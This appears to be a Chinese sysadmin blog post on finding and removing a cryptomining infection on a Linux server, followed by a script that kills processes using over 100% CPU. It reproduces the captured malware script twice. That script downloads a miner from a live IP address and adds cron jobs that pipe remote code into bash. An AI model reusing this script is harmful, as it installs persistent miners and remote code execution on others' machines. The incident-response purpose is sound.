今天top后发现一个进程CPU高1795%,判断是病毒
查找进程ps -elf|grep 进程id
pid和ppid查找到sleep进程
ps -ef|grep 4277
查看具体进程内容,ll /proc/进程id
pid
ll /proc/4277
ls -l /proc/{pid号}
ls -l /proc/{pid号}/exe
kill掉病毒进程
排查病毒代码位置
排查 www用户执行所有进程
ps -ef|grep www 发现
36239 www 20 0 76272 4976 452 S 0.3 0.0 174:24.97 .image.jpg
/tmp/.image.jpg (deleted)
www 202401 0.0 0.0 113292 1516 ? S 07:01 0:00 /var/tmp/.x/secure -c
www 248458 1 0 08:01 ? 00:00:00 /var/tmp/.x/secure -c
www 3241 0.1 0.0 113724 1836 ? S 4月01 151:10 /bin/sh ./php
www 3243 0.1 0.0 113724 1844 ? S 4月01 151:49 /bin/sh ./php
/proc/3243/exe -> /usr/bin/bash
/tmp/.XIM-unix/admin/.sftp (deleted)
/tmp/.XIM-unix/admin/.sftp (deleted)
exe -> /usr/bin/bash#!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ ?link1="http://95.214.24.102:6972/xrx/xrx" ?link2="http://95.214.24.102:6972/configs/config-xrx.json" ?mkdir /var/tmp/.xrx ?cd /var/tmp/.xrx/ ?chattr -ia /var/tmp/.xrx/xrx ?chattr -ia /var/tmp/.xrx/config.json ?rm -rf /var/tmp/.xrx/xrx ?rm -rf /var/tmp/.xrx/config.json ?curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate ?curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate ?mv config-xrx.json config.json ?chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then ?if ! crontab -l | grep -q 'secure'; then ?cd /dev/shm ?rm -rf /dev/shm/.spark ?echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "*/30 * * * * curl 95.214.24.102:1011/next | bash " >> .spark ?crontab .spark ?sleep 2 ?rm -rf /dev/shm/.spark ?fi fi if (( $EUID == 0 )); then ?if ! cat /etc/crontab | grep -q 'secure'; then ?echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "*/30 * * * * root curl 95.214.24.102:1011/next | bash " >> /etc/crontab ?fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then ?echo "miner intact" ?else ?echo "miner not found,downloading..." ?downloadminer fi if [[ "$fsiz" -gt 0 ]]; then ?echo "miner size intact" ?else ?echo "filesize 0,downloading..." 
?downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then ?echo "xrx not running,starting..." ?/var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 ?sleep 1 ?echo -e "pid:" ?pgrep xrx fi /var/tmp/.x/secure
发现病毒文件
www 248458 1 0 08:01 ? 00:00:00 /var/tmp/.x/secure -c
16393 www 20 0 107740 73912 4 S 0.3 0.0 0:03.88 sh
/tmp/.XIM-unix/admin/sh (deleted)
#!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ ?
link1="http://95.214.24.102:6972/xrx/xrx" ?
link2="http://95.214.24.102:6972/configs/config-xrx.json" ?mkdir /var/tmp/.xrx ?
cd /var/tmp/.xrx/ ?
chattr -ia /var/tmp/.xrx/xrx ?
chattr -ia /var/tmp/.xrx/config.json ?
rm -rf /var/tmp/.xrx/xrx ?
rm -rf /var/tmp/.xrx/config.json ?
curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate ?
curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate ?
mv config-xrx.json config.json ?chmod +x /var/tmp/.xrx/xrx }######################## ########################
crontablegend(){ if (( $EUID != 0 )); then ?
if ! crontab -l | grep -q 'secure'; then ?
cd /dev/shm ?
rm -rf /dev/shm/.spark ?
echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?
sleep 1 ?
echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?
echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?
echo "*/30 * * * * curl 95.214.24.102:1011/next | bash " >> .spark ?crontab .spark ?
sleep 2 ?rm -rf /dev/shm/.spark ?fi fi if (( $EUID == 0 )); then ?
if ! cat /etc/crontab | grep -q 'secure'; then ?
echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "*/30 * * * * root curl 95.214.24.102:1011/next | bash " >> /etc/crontab ?fi fi }######################## ########################
gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then ?
echo "miner intact" ?else ?echo "miner not found,downloading..." ?
downloadminer fi if [[ "$fsiz" -gt 0 ]]; then ?echo "miner size intact" ?else ?
echo "filesize 0,downloading..." ?downloadminer fi }
######################## ########################
gettingmineru crontablegend if test -z "$ifrunning" ; then ?echo "xrx not running,starting..." ?
/var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 ?sleep 1 ?echo -e "pid:" ?pgrep xrx fi /var/tmp/.x/secure
查找进程ps -elf|grep 进程id
pid和ppid查找到sleep进程
病毒执行代码
#!/bin/bash
cd -- /tmp/.XIM-unix/admin
cp -f -- .sh sh
./sh -c >/dev/null 2>&1
./.php -c >/dev/null 2>&1
rm -rf sh
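删除病毒代码(注意:只删除 admin 目录并不够。上面抓到的脚本还会写入定时任务:普通用户写入自己的 crontab,root 权限下写入 /etc/crontab,并引用 /var/tmp/.x、/var/tmp/.xrx 下的文件;这些也需要一并检查和清理,否则进程会被定时任务重新拉起。脚本里对这些文件执行过 chattr -ia,如果删除失败,可以先用 lsattr 确认文件是否带有 i/a 属性。)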
rm -rf admin
----------------------------------------------------------------------------------------
解决 linux top cpu超100 kill 脚本
在Linux系统中,`top` 命令是一个常用的性能分析工具,它可以实时显示系统的进程信息。如果您希望监控CPU使用率超过100%的进程,并在发现时杀死这些进程,可以编写一个简单的脚本来实现这个功能。
以下是一个简单的Bash脚本示例,它会定期运行 `top` 命令,并在发现CPU使用率超过100%的情况下杀死相应的进程:
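#!/bin/bash
# Watchdog helper: kill processes that top shows as running above 100% CPU.
#
# NOTE(review): selection is by CPU usage only. It cannot tell a miner from a
# legitimate multi-threaded service, and killing a process does not remove
# whatever restarts it (cron entries, dropped files).

#######################################
# Take one batch-mode snapshot from top and send SIGKILL to every process
# whose state column is "R" and whose %CPU column is above 100.
# Globals:   none
# Arguments: none
# Outputs:   one "Killed PID ..." line on stdout per process actually killed
# Returns:   non-zero if top itself fails, otherwise 0
#######################################
check_kill_process() {
  local snapshot pid

  # Capture first so a failing top is reported instead of silently yielding
  # an empty list.
  snapshot=$(top -b -n 1) || return

  while IFS= read -r pid; do
    # Only act on a plain decimal PID; anything else is a parsing accident.
    [[ "$pid" =~ ^[0-9]+$ ]] || continue
    # Never target init (PID 1) or this script itself.
    (( pid > 1 && pid != $$ )) || continue

    # Report only when the signal was actually delivered.
    if kill -9 "$pid" 2>/dev/null; then
      echo "Killed PID $pid because its CPU usage is greater than 100%"
    fi
  done < <(
    # Skip the summary area: rows count only after the "PID ..." header line.
    # The state is matched on its own column rather than with grep "R", which
    # also matched any row containing a capital R (user name, command name).
    # Assumes top's default column order (PID 1st, S 8th, %CPU 9th), as the
    # original did; a customised toprc changes it.
    # NOTE(review): a multi-threaded process may be listed in state S while
    # its threads use CPU; confirm whether the R filter is really wanted.
    awk '
      $1 == "PID" { in_table = 1; next }
      in_table && $8 == "R" && $9 + 0 > 100 { print $1 }
    ' <<<"$snapshot"
  )

  return 0
}
# Main loop: run the check function at a fixed interval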
# Poll forever: run one check, then pause 5 seconds before the next one.
while :; do
  check_kill_process
  sleep 5
done
请注意,该脚本使用了 `top` 命令的 `-b`(批处理模式)和 `-n`(指定循环次数)选项,以及管道(`|`)和 `grep`、`awk` 等命令来分析和处理输出。脚本会无限循环地运行,每5秒检查一次系统进程的CPU使用情况,并在发现CPU使用率超过100%时杀死相应的进程。
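在运行这个脚本之前,请确保您对其中使用的命令和行为有足够的了解,并且已经考虑到了可能对系统稳定性造成的影响。此外,这个脚本应该在有足够权限的用户下运行,通常是root用户。需要注意的是,多线程的正常业务进程(例如数据库、编译任务)CPU使用率同样可能超过100%,该脚本不区分进程归属,会一并杀死;而对于上文这类带有 crontab 持久化的挖矿程序,仅杀掉进程并不能清除它,进程会被定时任务重新拉起。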